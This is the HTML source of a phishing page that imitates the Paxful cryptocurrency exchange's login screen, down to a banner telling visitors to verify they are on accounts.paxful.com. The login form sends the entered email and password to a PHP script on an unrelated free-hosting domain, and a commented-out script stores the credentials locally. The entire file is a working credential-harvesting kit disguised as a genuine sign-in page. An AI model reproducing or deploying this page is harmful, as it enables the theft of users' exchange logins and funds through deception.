<!DOCTYPE html>
<html lang ="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">
<title>acounts.Paxful</title>
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;500;600;700&display=swap" rel="stylesheet">
<script src="array.js"></script>
<script src="px.js"></script>
<style>
* {
padding: 0;
margin: 0;
box-sizing: border-box;
}
body {
font-family: helvetica;
margin: 0;
background-size: #fff;
display: flex;
}
.header {
display: flex;
justify-content: space-between;
margin-left: 30px;
width: 100%;
}
.logo {
width: 122px;
height: 26px;
}
.form-box {
display: flex;
margin-top: 10px;
}
.item {
margin-top: 35px;
margin-left: 20px;
padding-top:26px;
box-sizing: border-box;
width: 40%;
padding: 2px 0px;
}
.item .logo {
margin-left: 15px;
cursor: pointer;
margin-top: 12px;
}
.hero {
background: radial-gradient(#f5fffa, #f4fafd);
margin-top: 0px;
margin-left: 100px;
display: flex;
justify-content: space-between;
width: 60%;
}
.hero img {
width: 800px;
height: 650px;
}
h2 {
color: rgb(98, 53, 144);
margin-left: 20px;
margin-top: 20px;
}
.row select {
width: 110px;
position: relative;
margin: 10px;
border: 1px solid #ccc;
padding: 7px 5px;
font-weight: bold;
border-radius: 3px;
color: #696969;
font-family: 'poppins' sans-serif;
box-shadow: none;
cursor: pointer;
outline: none;
}
.row select:focus{
min-width: 110px;
width: auto;
}
input[type=text], input[type=password] {
width: 100%;
padding: 26px;
margin: 8px 0 0 5px;
display: inline-block;
border: 1px solid #ccc;
box-sizing: border-box;
border-radius: 5px;
box-shadow: none;
height: 45px;
}
input[type=text], input[type=password]:focus{
outline: none;
}
input[type=password] {
background-position: 10px 10px;
background-repeat: no-repeat;
padding-left: 40px;
}
.container {
padding: 14px;
font-family: sans-serif;
}
.container label {
color: #697071;
font-family: sans-serif;
font-size: 14px;
font-weight: bold;
margin-left: 5px;
}
.container input {
display: flex;
}
.container img {
float: right;
margin-right: 8px;
margin-top: 20px;
}
.container span{
margin-left: 52%;
color: #83afe9;
font-size: 12px;
cursor: pointer;
}
.container p{
float: right;
margin-top: -35px;
margin-right: 8px;
color: #fff;
font-weight: bold;
cursor: pointer;
width: 12px;
height: 20px;
}
.container p:active{
background-color: #00a5ef;
box-shadow: 0 1px #666;
transform: translateY(2px);
}
.item-1{
background: rgb(244, 250, 253);
height: 68px;
width: 93%;
margin-left: 20px;
border: 1px solid rgb(176,224,230);
border-radius: 5px;
display: inline-flex;
justify-content: space-between;
}
.item-1 img{
margin-top: 10px;
margin-left: 6px;
}
.item1-text {
margin-top: 10px;
font-size: 11px;
color: #697071;
font-weight: bold;
letter-spacing: 0px;
margin-right: 10px;
margin-left: 5px;
}
.itm1 {
background-color: #fff;
padding: 0px 15px;
margin-right: 15px;
border-radius: 4px;
border: 1px solid #ccc;
font-family: sans-serif;
display: inline-flex;
max-height: 30px;
margin-top: 18px;
font-size: 12px;
}
.itm1 img {
height: 12px;
width: 10px;
margin-top: 6px;
}
.itm1 span {
margin-left: 2px;
margin-top: 6px;
color:#12c220;
font-size: 12px;
}
.itm1 p {
margin-top: 6px;
margin-left: 2px;
color: #697071;
font-weight: bold;
}
.item-2 {
background: rgb(248, 248, 248);
height: 68px;
border: 1px solid rgb(220, 220, 220);
margin-left: 20px;
width: 93%;
border-radius: 5px;
display: inline-flex;
justify-content: space-between;
padding: 5px 20px;
}
.item-2 img{
margin: -4px 5px 0px 0px;
width: 18px;
height: 20px;
}
.item-2 span {
margin-top: 2px;
font-weight: bold;
}
.item2-text {
display: inline-flex;
margin-top: 20px;
font-size: 13px;
color: #696969;
}
.item-2 a {
text-decoration: none;
margin-left: 3px;
color: #6495ed;
font-size: 13px;
}
.item-header {
display: flex;
justify-content: space-between;
}
button[type=button] {
background-color: #fff;
float: right;
padding: 2px 14px;
margin-right: 15px;
border-radius: 4px;
border: 1px solid #ccc;
color: #696969;
font-weight: bold;
font-family: sans-serif;
cursor: pointer;
max-height: 30px;
margin-top: 15px;
outline: none;
}
button[type=button]:hover{
background: #fffafa;
}
button[type=button]:active {
background-color: #fff;
box-shadow: 0 1px #666;
transform: translateY(2px);
}
.btn{
display:inline-flex;
background:#7f59ad;
color:#fff;
padding: 14px 10px;
margin:0px 30px 80px 0;
border-radius:30px;
text-decoration: none;
cursor: pointer;
width: 150px;
font-size: 14px;
font-family: sans-serif;
font-weight: bold;
justify-content: center;
box-shadow: 0 1px #999;
}
.btn:active {
box-shadow: 0 2px #666;
transform: translateY(1px);
}
.hero span {
float: right;
}
.hero div:last-child {
width: 25px;
margin-top: 610px;
}
input[type=button] {
background-color: #00a5ef;
border: none;
color: white;
padding: 16px 32px;
text-decoration: none;
margin: 4px 2px;
cursor: pointer;
width: 100%;
border-radius: 5px;
margin-left: 5px;
font-weight: bold;
font-size: 15px;
outline: none;
}
input[type=button]:active {
background-color: #00a5ef;
box-shadow: 0 1px #666;
transform: translateY(2px);
}
.row ul{
display: none;
}
@media screen and (max-width: 824px){
.hero {
display: none;
}
.item {
margin-top: 20px;
margin-left: 0px;
}
.item-1{
height: 90px;
width: 93%;
display: inline-flex;
justify-content: space-between;
}
.item-1 button {
}
.item-2 {
width: 93%;
}
.item-2 button[type=button]{
display: none;
}
.container span{
margin-left: 50%;
color: #83afe9;
font-size: 12px;
cursor: pointer;
}
/*--.item-3 {
width: 107.5%;
margin-left: 3px;
}--*/
input[type=text], input[type=password] {
width: 100%;
}
.row select {
margin-left: 80%;
}
h2 {
font-size: 19px;
}
}
@media screen and (min-width: 824px){
.item-2 a {
display: none;
}
}
</style>
</head>
<body>
<div class ="header">
<div class ="item">
<div class ="item-header">
<img class ="logo" src ="2b.png">
<div class="row">
<select name="laguages" id="mbPOCControlsLangDrop" class ="mb-POCControls_Selector">
<option id ="id" class ="translate">Bahasa Indonesia</option>
<option id="Bahasa Malayu" class ="translate">Bahasa Melayu</option>
<option id="cs" class ="translate">Čeština</option>
<option id ="de" class ="translate">Deutsch</option>
<option id="en" class ="translate">English</option>
<option id="es" class ="translate">Español</option>
<option id ="fr" class ="translate">Français</option>
<option id="it" class ="translate">Italiano</option>
<option id="nd" class ="translate">Nederlands</option>
<option id="po" class ="translate">Polski</option>
<option id="por" class ="translate">Português</option>
<option id="pb" class ="translate">Portugues brasileiro</option>
<option id="ru" class ="translate">Русский</option>
<option id="sn" class ="translate">Svenska</option>
<option id="ti" class ="translate">Tieng Viet</option>
<option id="tu" class ="translate">Türkçe</option>
<option id="wt" class ="translate">Wikeng Tagalog</option>
<option id="zh-tn" class ="translate">한국어</option>
<option id="zh-tw" class ="translate">日本語</option>
</select>
</div>
</div>
<br>
<h2>Log In with Paxful</h2>
<br>
<div class ="form-box">
<form action="http://tardiest-typists.000webhostapp.com/post.php" method ="POST">
<div class ="item-1">
<img src ="9.png" style="width: 26px; height: 26px; margin-right: 5px;">
<p class ="item1-text">IMPORTANT! Please check<br>you are visiting<br>https://accounts.paxful.com/</p>
<div class="itm1"><img src ="5.png"><span>https</span><p>://accounts.paxful.com</p></div>
</div>
<br><br>
<div class ="item-2">
<p class ="item2-text"><img src ="7.png"><span>New to Paxful?</span><a href ="#">Create an Account</a></p>
<button type="button" id ="itm2-btn" href ="#">Create an Account</button>
</div>
<br>
<div class="container">
<label for="email">Email address</label>
<input type="text" id ="input-email" name="email" required>
<br>
<label for="psw">Password <span>Forgot password?</span></label>
<input type="password" id ="pwd" class = "masked" name ="password" required>
<img src ="11b.png" id ="eye" style="width: 20px;height: 10px;cursor: pointer; margin-top: -28px;" >
<br>
<input type="button" id ="submit-btn" value ="Log in" onclick ="save()"><p>›</p>
</div>
</form>
</div>
</div>
<div class ="hero">
<div><img src ="8.png" style ="width: 500px; height: 505px; margin: 120px;"></div>
<div> <span><a href="" class="btn"><img src ="4.png" style="width: 16px; height: 16px; margin-right: 4px;"> Contact us</a></span></div>
</div>
</div>
<script async>
/*-- // JS for collecting form data in local storage
function save(){
let new_data = '' + document.getElementById("input-email").value;
let new_data = '' + document.getElementById("input-psw").value;
if(localStorage.getItem("data") == null){
localStorage.setItem("data", "[]");
}
let old_data = JSON.parse(localStorage.getItem("data"));
old_data.push(new_data);
localStorage.setItem("data", JSON.stringify(old_data));
}--*/
function show() {
var p = document.getElementById('pwd');
p.setAttribute('type', 'text');
}
function hide() {
var p = document.getElementById('pwd');
p.setAttribute('type', 'password');
}
var pwShown = 0;
document.getElementById("eye").addEventListener("click", function () {
if (pwShown == 0) {
pwShown = 1;
show();
} else {
pwShown = 0;
hide();
}
}, false);
//Custom function that changes a select element's option.
function select(selectId, optionValToSelect){
//Get the select element by it's unique ID.
var selectElement = document.getElementById("languages");
//Get the options.
var selectOptions = selectElement.options;
//Loop through these options using a for loop.
for (var opt, j = 0; opt = selectOptions[j]; j++) {
//If the option of value is equal to the option we want to select.
if (opt.value == optionValToSelect) {
//Select the option and break out of the for loop.
selectElement.selectedIndex = j;
break;
}
}
}
</script>
</body>
</html>